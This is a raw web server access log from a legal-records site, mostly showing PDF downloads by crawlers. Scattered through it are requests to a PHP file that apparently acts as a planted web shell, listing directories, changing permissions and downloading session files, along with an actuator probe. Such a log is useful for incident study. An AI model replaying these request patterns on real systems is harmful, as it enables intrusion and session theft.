172.22.2.4 - - [22/Jun/2024:11:51:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
3.224.220.101 - - [22/Jun/2024:11:53:30 -0500] "GET /BLA/resoluciones/AUTOS%202018/0490.pdf HTTP/1.1" 200 338670
52.70.240.171 - - [22/Jun/2024:11:53:33 -0500] "GET /BLA/resoluciones/AUTOS%202018/1047.pdf HTTP/1.1" 200 308565
52.70.240.171 - - [22/Jun/2024:11:53:38 -0500] "GET /BLA/resoluciones/AUTOS%202018/0489.pdf HTTP/1.1" 200 339169
52.70.240.171 - - [22/Jun/2024:11:53:42 -0500] "GET /BLA/resoluciones/AUTOS%202019/2614.pdf HTTP/1.1" 200 280567
23.22.35.162 - - [22/Jun/2024:11:53:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/0488.pdf HTTP/1.1" 200 338817
52.70.240.171 - - [22/Jun/2024:11:53:49 -0500] "GET /BLA/resoluciones/AUTOS%202018/1045.pdf HTTP/1.1" 200 330420
52.70.240.171 - - [22/Jun/2024:11:53:53 -0500] "GET /BLA/resoluciones/AUTOS%202019/2611.pdf HTTP/1.1" 200 338999
3.224.220.101 - - [22/Jun/2024:11:53:57 -0500] "GET /BLA/resoluciones/AUTOS%202018/0485.pdf HTTP/1.1" 200 345993
23.22.35.162 - - [22/Jun/2024:11:54:01 -0500] "GET /BLA/resoluciones/AUTOS%202018/1043.pdf HTTP/1.1" 200 298443
52.70.240.171 - - [22/Jun/2024:11:54:06 -0500] "GET /BLA/resoluciones/AUTOS%202019/2610.pdf HTTP/1.1" 200 339743
47.128.127.112 - - [22/Jun/2024:11:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.127.112 - - [22/Jun/2024:11:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.127.112 - - [22/Jun/2024:11:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.127.112 - - [22/Jun/2024:11:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.127.112 - - [22/Jun/2024:11:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.127.112 - - [22/Jun/2024:11:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.127.112 - - [22/Jun/2024:11:54:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1151-1200&f=00001154.tif HTTP/1.1" 200 17696
47.128.127.112 - - [22/Jun/2024:11:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.127.112 - - [22/Jun/2024:11:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.127.112 - - [22/Jun/2024:11:54:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
23.22.35.162 - - [22/Jun/2024:11:54:09 -0500] "GET /BLA/resoluciones/AUTOS%202018/0484.pdf HTTP/1.1" 200 345093
47.128.127.112 - - [22/Jun/2024:11:54:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
201.245.192.253 - - [22/Jun/2024:11:54:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.224.220.101 - - [22/Jun/2024:11:54:18 -0500] "GET /BLA/resoluciones/AUTOS%202019/2596.pdf HTTP/1.1" 200 2366086
23.22.35.162 - - [22/Jun/2024:11:54:21 -0500] "GET /BLA/resoluciones/AUTOS%202018/1042.pdf HTTP/1.1" 200 281269
52.70.240.171 - - [22/Jun/2024:11:54:21 -0500] "GET /BLA/resoluciones/AUTOS%202018/0482.pdf HTTP/1.1" 200 367236
216.245.221.92 - - [22/Jun/2024:11:54:24 -0500] "HEAD / HTTP/1.1" 200 -
52.70.240.171 - - [22/Jun/2024:11:54:25 -0500] "GET /BLA/resoluciones/AUTOS%202018/1040.pdf HTTP/1.1" 200 252036
23.22.35.162 - - [22/Jun/2024:11:54:30 -0500] "GET /BLA/resoluciones/AUTOS%202018/0481.pdf HTTP/1.1" 200 1501502
40.77.167.32 - - [22/Jun/2024:11:54:30 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2002%2FRES+2002+401-450%2F HTTP/1.1" 200 12024
52.70.240.171 - - [22/Jun/2024:11:54:34 -0500] "GET /BLA/resoluciones/AUTOS%202019/2595.pdf HTTP/1.1" 200 261523
216.244.66.195 - - [22/Jun/2024:11:54:34 -0500] "GET /robots.txt HTTP/1.1" 404 1018
23.22.35.162 - - [22/Jun/2024:11:54:38 -0500] "GET /BLA/resoluciones/AUTOS%202018/1039.pdf HTTP/1.1" 200 356614
52.70.240.171 - - [22/Jun/2024:11:54:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/1038.pdf HTTP/1.1" 200 262067
3.224.220.101 - - [22/Jun/2024:11:54:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/0480.pdf HTTP/1.1" 200 8307445
52.70.240.171 - - [22/Jun/2024:11:54:50 -0500] "GET /BLA/resoluciones/AUTOS%202019/2594.pdf HTTP/1.1" 200 346238
52.70.240.171 - - [22/Jun/2024:11:54:54 -0500] "GET /BLA/resoluciones/AUTOS%202018/1037.pdf HTTP/1.1" 200 250668
47.128.127.150 - - [22/Jun/2024:11:54:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp%5C&f=sess_etf3r3edtfiut1m5q6mm2qm8h6&ft=download&white=1 HTTP/1.1" 200 10892
23.22.35.162 - - [22/Jun/2024:11:54:58 -0500] "GET /BLA/resoluciones/AUTOS%202018/0479.pdf HTTP/1.1" 200 4298282
52.22.236.30 - - [22/Jun/2024:11:54:59 -0500] "HEAD / HTTP/1.1" 200 -
23.22.35.162 - - [22/Jun/2024:11:55:02 -0500] "GET /BLA/resoluciones/AUTOS%202019/2593.pdf HTTP/1.1" 200 333145
23.22.35.162 - - [22/Jun/2024:11:55:05 -0500] "GET /BLA/resoluciones/AUTOS%202018/1033.pdf HTTP/1.1" 200 298805
23.22.35.162 - - [22/Jun/2024:11:55:10 -0500] "GET /BLA/resoluciones/AUTOS%202018/0478.pdf HTTP/1.1" 200 776937
23.22.35.162 - - [22/Jun/2024:11:55:13 -0500] "GET /BLA/resoluciones/AUTOS%202019/2592.pdf HTTP/1.1" 200 321398
201.245.192.253 - - [22/Jun/2024:11:55:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.70.240.171 - - [22/Jun/2024:11:55:18 -0500] "GET /BLA/resoluciones/AUTOS%202018/0477.pdf HTTP/1.1" 200 287654
52.70.240.171 - - [22/Jun/2024:11:55:21 -0500] "GET /BLA/resoluciones/AUTOS%202018/1032.pdf HTTP/1.1" 200 282501
3.224.220.101 - - [22/Jun/2024:11:55:26 -0500] "GET /BLA/resoluciones/AUTOS%202019/2591.pdf HTTP/1.1" 200 342679
23.22.35.162 - - [22/Jun/2024:11:55:29 -0500] "GET /BLA/resoluciones/AUTOS%202018/0476.pdf HTTP/1.1" 200 255959
23.22.35.162 - - [22/Jun/2024:11:55:34 -0500] "GET /BLA/resoluciones/AUTOS%202018/1031.pdf HTTP/1.1" 200 287821
23.22.35.162 - - [22/Jun/2024:11:55:38 -0500] "GET /BLA/resoluciones/AUTOS%202019/2590.pdf HTTP/1.1" 200 329335
52.70.240.171 - - [22/Jun/2024:11:55:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/0474.pdf HTTP/1.1" 200 7876549
23.22.35.162 - - [22/Jun/2024:11:55:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/1030.pdf HTTP/1.1" 200 715120
3.224.220.101 - - [22/Jun/2024:11:55:49 -0500] "GET /BLA/resoluciones/AUTOS%202018/0473.pdf HTTP/1.1" 200 328252
23.22.35.162 - - [22/Jun/2024:11:55:54 -0500] "GET /BLA/resoluciones/AUTOS%202019/2589.pdf HTTP/1.1" 200 3206893
47.128.32.83 - - [22/Jun/2024:11:55:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4754.pdf HTTP/1.1" 200 2901
52.70.240.171 - - [22/Jun/2024:11:55:58 -0500] "GET /BLA/resoluciones/AUTOS%202018/1029.pdf HTTP/1.1" 200 281935
66.249.66.20 - - [22/Jun/2024:11:55:59 -0500] "GET /BLA/resoluciones/AUTOS%202023/0788.pdf HTTP/1.1" 200 404734
52.70.240.171 - - [22/Jun/2024:11:56:02 -0500] "GET /BLA/resoluciones/AUTOS%202018/0472.pdf HTTP/1.1" 200 1060844
52.70.240.171 - - [22/Jun/2024:11:56:06 -0500] "GET /BLA/resoluciones/AUTOS%202019/2588.pdf HTTP/1.1" 200 2509033
52.70.240.171 - - [22/Jun/2024:11:56:10 -0500] "GET /BLA/resoluciones/AUTOS%202018/1028.pdf HTTP/1.1" 200 301773
3.224.220.101 - - [22/Jun/2024:11:56:13 -0500] "GET /BLA/resoluciones/AUTOS%202019/2587.pdf HTTP/1.1" 200 1443401
201.245.192.253 - - [22/Jun/2024:11:56:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.224.220.101 - - [22/Jun/2024:11:56:17 -0500] "GET /BLA/resoluciones/AUTOS%202018/0471.pdf HTTP/1.1" 200 6121161
3.224.220.101 - - [22/Jun/2024:11:56:22 -0500] "GET /BLA/resoluciones/AUTOS%202018/1027.pdf HTTP/1.1" 200 296708
3.224.220.101 - - [22/Jun/2024:11:56:26 -0500] "GET /BLA/resoluciones/AUTOS%202018/0470.pdf HTTP/1.1" 200 511815
23.22.35.162 - - [22/Jun/2024:11:56:29 -0500] "GET /BLA/resoluciones/AUTOS%202019/2586.pdf HTTP/1.1" 200 1067691
52.70.240.171 - - [22/Jun/2024:11:56:33 -0500] "GET /BLA/resoluciones/AUTOS%202018/1026.pdf HTTP/1.1" 200 288923
47.128.99.174 - - [22/Jun/2024:11:56:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp&f=sess_6eppqo772n208jvd42v7b20nb1 HTTP/1.1" 200 2696
3.224.220.101 - - [22/Jun/2024:11:56:38 -0500] "GET /BLA/resoluciones/AUTOS%202019/2585.pdf HTTP/1.1" 200 440799
52.70.240.171 - - [22/Jun/2024:11:56:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/0468.pdf HTTP/1.1" 200 809601
52.70.240.171 - - [22/Jun/2024:11:56:45 -0500] "GET /BLA/resoluciones/AUTOS%202018/1025.pdf HTTP/1.1" 200 295936
168.119.101.10 - - [22/Jun/2024:11:56:46 -0500] "GET / HTTP/1.1" 200 4720
23.22.35.162 - - [22/Jun/2024:11:56:50 -0500] "GET /BLA/resoluciones/AUTOS%202019/2584.pdf HTTP/1.1" 200 1089228
23.22.35.162 - - [22/Jun/2024:11:56:53 -0500] "GET /BLA/resoluciones/AUTOS%202018/0467.pdf HTTP/1.1" 200 453044
3.224.220.101 - - [22/Jun/2024:11:56:58 -0500] "GET /BLA/resoluciones/AUTOS%202018/1024.pdf HTTP/1.1" 200 301547
52.70.240.171 - - [22/Jun/2024:11:57:02 -0500] "GET /BLA/resoluciones/AUTOS%202018/0461.pdf HTTP/1.1" 200 283169
3.224.220.101 - - [22/Jun/2024:11:57:06 -0500] "GET /BLA/resoluciones/AUTOS%202019/2569.pdf HTTP/1.1" 200 282845
3.224.220.101 - - [22/Jun/2024:11:57:10 -0500] "GET /BLA/resoluciones/AUTOS%202018/1023.pdf HTTP/1.1" 200 270883
207.46.13.92 - - [22/Jun/2024:11:57:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/2105.pdf HTTP/1.1" 200 1859105
201.245.192.253 - - [22/Jun/2024:11:57:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
3.224.220.101 - - [22/Jun/2024:11:57:13 -0500] "GET /BLA/resoluciones/AUTOS%202018/0460.pdf HTTP/1.1" 200 336104
23.22.35.162 - - [22/Jun/2024:11:57:17 -0500] "GET /BLA/resoluciones/AUTOS%202019/2562.pdf HTTP/1.1" 200 258010
201.245.192.253 - - [22/Jun/2024:11:57:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.70.240.171 - - [22/Jun/2024:11:57:21 -0500] "GET /BLA/resoluciones/AUTOS%202018/1022.pdf HTTP/1.1" 200 273267
23.22.35.162 - - [22/Jun/2024:11:57:25 -0500] "GET /BLA/resoluciones/AUTOS%202018/0457.pdf HTTP/1.1" 200 275667
47.128.63.213 - - [22/Jun/2024:11:57:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono%5C&f=cambio_climatico.html&ft=img&white=1 HTTP/1.1" 200 7770
47.128.63.213 - - [22/Jun/2024:11:57:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/estilos.css HTTP/1.1" 404 1434
47.128.63.213 - - [22/Jun/2024:11:57:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/Imagenes/btn_verde.png HTTP/1.1" 404 1434
47.128.63.213 - - [22/Jun/2024:11:57:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/Imagenes/btn_verde4.png HTTP/1.1" 404 1434
47.128.63.213 - - [22/Jun/2024:11:57:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/Imagenes/btn_verde2.png HTTP/1.1" 404 1434
47.128.63.213 - - [22/Jun/2024:11:57:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/Imagenes/btn_verde3.png HTTP/1.1" 404 1434
52.70.240.171 - - [22/Jun/2024:11:57:29 -0500] "GET /BLA/resoluciones/AUTOS%202019/2561.pdf HTTP/1.1" 200 258388
47.128.63.213 - - [22/Jun/2024:11:57:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/Imagenes/btn_verde5.png HTTP/1.1" 404 1434
52.70.240.171 - - [22/Jun/2024:11:57:33 -0500] "GET /BLA/resoluciones/AUTOS%202018/0456.pdf HTTP/1.1" 200 249401
52.70.240.171 - - [22/Jun/2024:11:57:38 -0500] "GET /BLA/resoluciones/AUTOS%202018/1021.pdf HTTP/1.1" 200 296738
52.70.240.171 - - [22/Jun/2024:11:57:42 -0500] "GET /BLA/resoluciones/AUTOS%202019/2560.pdf HTTP/1.1" 200 258334
52.70.240.171 - - [22/Jun/2024:11:57:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/0455.pdf HTTP/1.1" 200 858035
3.224.220.101 - - [22/Jun/2024:11:57:50 -0500] "GET /BLA/resoluciones/AUTOS%202018/1020.pdf HTTP/1.1" 200 304972
3.224.220.101 - - [22/Jun/2024:11:57:53 -0500] "GET /BLA/resoluciones/AUTOS%202019/2559.pdf HTTP/1.1" 200 251240
23.22.35.162 - - [22/Jun/2024:11:57:57 -0500] "GET /BLA/resoluciones/AUTOS%202018/0454.pdf HTTP/1.1" 200 244213
23.22.35.162 - - [22/Jun/2024:11:58:02 -0500] "GET /BLA/resoluciones/AUTOS%202018/1019.pdf HTTP/1.1" 200 300755
52.70.240.171 - - [22/Jun/2024:11:58:05 -0500] "GET /BLA/resoluciones/AUTOS%202019/2558.pdf HTTP/1.1" 200 250257
3.20.63.178 - - [22/Jun/2024:11:58:07 -0500] "HEAD / HTTP/1.1" 200 -
3.224.220.101 - - [22/Jun/2024:11:58:10 -0500] "GET /BLA/resoluciones/AUTOS%202018/0451.pdf HTTP/1.1" 200 1386290
3.224.220.101 - - [22/Jun/2024:11:58:14 -0500] "GET /BLA/resoluciones/AUTOS%202018/1018.pdf HTTP/1.1" 200 314819
47.128.117.126 - - [22/Jun/2024:11:58:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5Csvr-ciudadano&sort=0a HTTP/1.1" 200 3684
47.128.117.126 - - [22/Jun/2024:11:58:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
201.245.192.253 - - [22/Jun/2024:11:58:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.117.126 - - [22/Jun/2024:11:58:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
23.22.35.162 - - [22/Jun/2024:11:58:18 -0500] "GET /BLA/resoluciones/AUTOS%202019/2557.pdf HTTP/1.1" 200 250047
52.70.240.171 - - [22/Jun/2024:11:58:21 -0500] "GET /BLA/resoluciones/AUTOS%202018/0450.pdf HTTP/1.1" 200 674159
172.22.2.4 - - [22/Jun/2024:11:56:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
23.22.35.162 - - [22/Jun/2024:11:58:25 -0500] "GET /BLA/resoluciones/AUTOS%202018/0446.pdf HTTP/1.1" 200 279023
3.224.220.101 - - [22/Jun/2024:11:58:30 -0500] "GET /BLA/resoluciones/AUTOS%202019/2556.pdf HTTP/1.1" 200 256663
52.70.240.171 - - [22/Jun/2024:11:58:33 -0500] "GET /BLA/resoluciones/AUTOS%202018/0444.pdf HTTP/1.1" 200 322971
3.224.220.101 - - [22/Jun/2024:11:58:37 -0500] "GET /BLA/resoluciones/AUTOS%202018/1017.pdf HTTP/1.1" 200 347207
3.224.220.101 - - [22/Jun/2024:11:58:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/0441.pdf HTTP/1.1" 200 275977
3.224.220.101 - - [22/Jun/2024:11:58:46 -0500] "GET /BLA/resoluciones/AUTOS%202019/2555.pdf HTTP/1.1" 200 258080
3.224.220.101 - - [22/Jun/2024:11:58:50 -0500] "GET /BLA/resoluciones/AUTOS%202018/1016.pdf HTTP/1.1" 200 447576
23.22.35.162 - - [22/Jun/2024:11:58:53 -0500] "GET /BLA/resoluciones/AUTOS%202019/2554.pdf HTTP/1.1" 200 257685
52.70.240.171 - - [22/Jun/2024:11:58:57 -0500] "GET /BLA/resoluciones/AUTOS%202018/0439.pdf HTTP/1.1" 200 289509
3.224.220.101 - - [22/Jun/2024:11:59:02 -0500] "GET /BLA/resoluciones/AUTOS%202018/1015.pdf HTTP/1.1" 200 297454
52.70.240.171 - - [22/Jun/2024:11:59:05 -0500] "GET /BLA/resoluciones/AUTOS%202019/2553.pdf HTTP/1.1" 200 257246
47.128.119.207 - - [22/Jun/2024:11:59:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6295.pdf HTTP/1.1" 200 2901
23.22.35.162 - - [22/Jun/2024:11:59:09 -0500] "GET /BLA/resoluciones/AUTOS%202018/0434.pdf HTTP/1.1" 200 320547
23.22.35.162 - - [22/Jun/2024:11:59:14 -0500] "GET /BLA/resoluciones/AUTOS%202018/1014.pdf HTTP/1.1" 200 279154
172.22.2.4 - - [22/Jun/2024:11:57:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
3.224.220.101 - - [22/Jun/2024:11:59:17 -0500] "GET /BLA/resoluciones/AUTOS%202019/2552.pdf HTTP/1.1" 200 256117
201.245.192.253 - - [22/Jun/2024:11:59:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
83.97.73.245 - - [22/Jun/2024:11:59:18 -0500] "GET /actuator/gateway/routes HTTP/1.1" 404 1018
52.70.240.171 - - [22/Jun/2024:11:59:22 -0500] "GET /BLA/resoluciones/AUTOS%202018/0433.pdf HTTP/1.1" 200 727667
216.245.221.92 - - [22/Jun/2024:11:59:24 -0500] "HEAD / HTTP/1.1" 200 -
52.70.240.171 - - [22/Jun/2024:11:59:26 -0500] "GET /BLA/resoluciones/AUTOS%202018/1008.pdf HTTP/1.1" 200 217300
52.70.240.171 - - [22/Jun/2024:11:59:30 -0500] "GET /BLA/resoluciones/AUTOS%202018/0432.pdf HTTP/1.1" 200 320288
3.224.220.101 - - [22/Jun/2024:11:59:34 -0500] "GET /BLA/resoluciones/AUTOS%202018/1007.pdf HTTP/1.1" 200 595628
3.224.220.101 - - [22/Jun/2024:11:59:37 -0500] "GET /BLA/resoluciones/AUTOS%202019/2551.pdf HTTP/1.1" 200 258770
52.70.240.171 - - [22/Jun/2024:11:59:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/1006.pdf HTTP/1.1" 200 230757
207.46.13.102 - - [22/Jun/2024:11:59:43 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2007%2FRES+2007+1001+AL+1100%2F HTTP/1.1" 200 26838
52.70.240.171 - - [22/Jun/2024:11:59:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/0431.pdf HTTP/1.1" 200 318454
52.70.240.171 - - [22/Jun/2024:11:59:50 -0500] "GET /BLA/resoluciones/AUTOS%202019/2550.pdf HTTP/1.1" 200 257146
3.224.220.101 - - [22/Jun/2024:11:59:54 -0500] "GET /BLA/resoluciones/AUTOS%202018/1005.pdf HTTP/1.1" 200 400030
47.128.43.149 - - [22/Jun/2024:11:59:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp&f=sess_acbfsdcc8noj6e874g5t06s9g0&ft=download HTTP/1.1" 200 10889
23.22.35.162 - - [22/Jun/2024:11:59:58 -0500] "GET /BLA/resoluciones/AUTOS%202019/2549.pdf HTTP/1.1" 200 258107
23.22.35.162 - - [22/Jun/2024:12:00:01 -0500] "GET /BLA/resoluciones/AUTOS%202018/0430.pdf HTTP/1.1" 200 322249
52.70.240.171 - - [22/Jun/2024:12:00:05 -0500] "GET /BLA/resoluciones/AUTOS%202018/1001.pdf HTTP/1.1" 200 244384
3.224.220.101 - - [22/Jun/2024:12:00:09 -0500] "GET /BLA/resoluciones/AUTOS%202018/0428.pdf HTTP/1.1" 200 321611
23.22.35.162 - - [22/Jun/2024:12:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202019/2548.pdf HTTP/1.1" 200 267253
201.245.192.253 - - [22/Jun/2024:12:00:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.224.220.101 - - [22/Jun/2024:12:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202018/1000.pdf HTTP/1.1" 200 237582
52.70.240.171 - - [22/Jun/2024:12:00:21 -0500] "GET /BLA/resoluciones/AUTOS%202018/0427.pdf HTTP/1.1" 200 322031
3.224.220.101 - - [22/Jun/2024:12:00:26 -0500] "GET /BLA/resoluciones/AUTOS%202019/2547.pdf HTTP/1.1" 200 257944
3.224.220.101 - - [22/Jun/2024:12:00:29 -0500] "GET /BLA/resoluciones/AUTOS%202018/0997.pdf HTTP/1.1" 200 1449840
3.224.220.101 - - [22/Jun/2024:12:00:34 -0500] "GET /BLA/resoluciones/AUTOS%202019/2546.pdf HTTP/1.1" 200 256705
23.22.35.162 - - [22/Jun/2024:12:00:38 -0500] "GET /BLA/resoluciones/AUTOS%202018/0425.pdf HTTP/1.1" 200 321705
207.46.13.102 - - [22/Jun/2024:12:00:41 -0500] "GET /Publicaciones/2024EE110493.pdf HTTP/1.1" 404 228
52.70.240.171 - - [22/Jun/2024:12:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/0996.pdf HTTP/1.1" 200 284557
52.70.240.171 - - [22/Jun/2024:12:00:46 -0500] "GET /BLA/resoluciones/AUTOS%202019/2545.pdf HTTP/1.1" 200 257832
47.128.22.154 - - [22/Jun/2024:12:00:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages&f=icons32-vs-2x.png HTTP/1.1" 200 16239
47.128.22.154 - - [22/Jun/2024:12:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.22.154 - - [22/Jun/2024:12:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.22.154 - - [22/Jun/2024:12:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.22.154 - - [22/Jun/2024:12:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.22.154 - - [22/Jun/2024:12:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.22.154 - - [22/Jun/2024:12:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.22.154 - - [22/Jun/2024:12:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.22.154 - - [22/Jun/2024:12:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.22.154 - - [22/Jun/2024:12:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.22.154 - - [22/Jun/2024:12:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
52.70.240.171 - - [22/Jun/2024:12:00:50 -0500] "GET /BLA/resoluciones/AUTOS%202018/0424.pdf HTTP/1.1" 200 315251
3.224.220.101 - - [22/Jun/2024:12:00:54 -0500] "GET /BLA/resoluciones/AUTOS%202018/0995.pdf HTTP/1.1" 200 280142
23.22.35.162 - - [22/Jun/2024:12:00:57 -0500] "GET /BLA/resoluciones/AUTOS%202018/0423.pdf HTTP/1.1" 200 315852
52.70.240.171 - - [22/Jun/2024:12:01:02 -0500] "GET /BLA/resoluciones/AUTOS%202019/2544.pdf HTTP/1.1" 200 258167
23.22.35.162 - - [22/Jun/2024:12:01:06 -0500] "GET /BLA/resoluciones/AUTOS%202018/0990.pdf HTTP/1.1" 200 288081
3.224.220.101 - - [22/Jun/2024:12:01:09 -0500] "GET /BLA/resoluciones/AUTOS%202018/0421.pdf HTTP/1.1" 200 320467
3.224.220.101 - - [22/Jun/2024:12:01:14 -0500] "GET /BLA/resoluciones/AUTOS%202019/2543.pdf HTTP/1.1" 200 268066
201.245.192.253 - - [22/Jun/2024:12:01:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.70.240.171 - - [22/Jun/2024:12:01:18 -0500] "GET /BLA/resoluciones/AUTOS%202018/0989.pdf HTTP/1.1" 200 246344
52.70.240.171 - - [22/Jun/2024:12:01:22 -0500] "GET /BLA/resoluciones/AUTOS%202018/0420.pdf HTTP/1.1" 200 314657
23.22.35.162 - - [22/Jun/2024:12:01:25 -0500] "GET /BLA/resoluciones/AUTOS%202019/2542.pdf HTTP/1.1" 200 257581
52.70.240.171 - - [22/Jun/2024:12:01:29 -0500] "GET /BLA/resoluciones/AUTOS%202018/0988.pdf HTTP/1.1" 200 3394717
23.22.35.162 - - [22/Jun/2024:12:01:34 -0500] "GET /BLA/resoluciones/AUTOS%202018/0419.pdf HTTP/1.1" 200 319799
181.53.14.143 - - [22/Jun/2024:12:01:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 42825
181.53.14.143 - - [22/Jun/2024:12:01:34 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:36 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.14.143 - - [22/Jun/2024:12:01:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [22/Jun/2024:12:01:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 36091
